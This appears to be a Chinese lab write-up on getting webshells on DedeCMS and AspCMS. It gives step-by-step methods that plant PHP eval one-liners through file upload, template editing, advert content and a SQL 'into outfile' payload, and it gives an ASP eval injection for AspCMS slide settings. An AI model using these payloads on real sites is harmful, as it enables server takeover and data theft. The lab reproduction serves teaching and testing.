当前位置: 首页 > news >正文

dedecms(四种webshell姿势)aspcms webshell漏洞复现

 dedecms

我们首先访问靶场

姿势1上传文件getshell

首先登录后台

点击文件管理器》文件上传

写一个php一句话木马文件

然后进行上传

点击上传之后提示上传成功并且目录里也显示了我们刚刚上传的文件,并且最上面有显示文件的路径

然后我们进行访问并连接

连接成功

姿势2 修改模版文件getshell

点击模版找到index.html 并点击修改

在代码的开头写入php一句话木马,点击保存

然后返回点击生成,修改网页为静态网页

然后进行访问

并连接

姿势3后台任意命令执行getshell

模块》广告管理》增加一个新广告

在广告内容里写入一句话木马

然后点击代码在,里面找到文件的路径

访问并连接

姿势4 sql命令执行写入php木马getshell

点击系统》sql命令执行工具》写入payload

select '<?php @eval($_POST[cmd]);?>' into outfile "D:/phpstudy_pro/www/dedecms/2.php"

然后直接访问我们写入的2.php文件并进行连接

aspcms

访问网站出现报错

说明浏览器不会给我们自动访问index网页,那么我们在url后面加上index.asp再进行访问

访问后台管理页面,并使用账号密码登录 

admin        123456

然后点击扩展》幻灯片设置》点击保存时进行抓包

在抓取的数据包中修改 slideTextstatus 字段的值为以下代码并进行发包查看被修改的asp
文件内容

1%25><%25Eval(Request(chr(65)))%25><%25        密码为a

然后进行访问并进行连接

使用菜刀进行连接,并成功getshell


http://www.mrgr.cn/news/28190.html

相关文章:

  • 处理namespace问题:Namespace not specified for AGP 8.0.0
  • vue2项目中在线预览csv文件
  • 自动化生成测试用例:利用OpenAI提升电商网站测试覆盖率
  • 从0开始学习机器学习--Day26--聚类算法
  • hive alter table add columns 是否使用 cascade 的方案
  • Vue3 动态获取 assets 文件夹图片
  • 从冯唐的成事心法 看SAP协助企业战略落地到信息化
  • kubernetes中pause容器的作用与源码详解
  • 神经网络_使用tensorflow对fashion mnist衣服数据集分类
  • OpenGL笔记二十一之几何类设计
  • 数组学习内容
  • 基于深度学习,通过病理切片直接预测HPV状态|文献速递·24-09-16
  • 进程间关系和守护进程
  • AG32 MCU的引脚特点及功耗说明
  • AIP接口调用
  • 8. Transforms的使用(三)-- Resize
  • 【C++】学完c语言后的c++基础知识补充!(命名空间、输入和输出、缺省函数、函数重载、引用、内联函数代替宏、nullptr代替NULL)
  • keil5进行stm32编程时常遇到的问题和ST-LINK在线仿真的连接问题
  • 哈哈哈,让 GitHub Copilot 用上 deepseek,性能不输 GPT-4,每月立即省 10 刀!
  • 为什么全双工不需要冲突检测
  • 1184. 公交站间的距离(24.9.16)
  • 初始爬虫7
  • 横向移动-WMI
  • MutationObserver详解+案例——深入理解 JavaScript 中的 MutationObserver:原理与实战案例
  • AtCoder Beginner Contest 371
  • ubuntu20.04编译mesa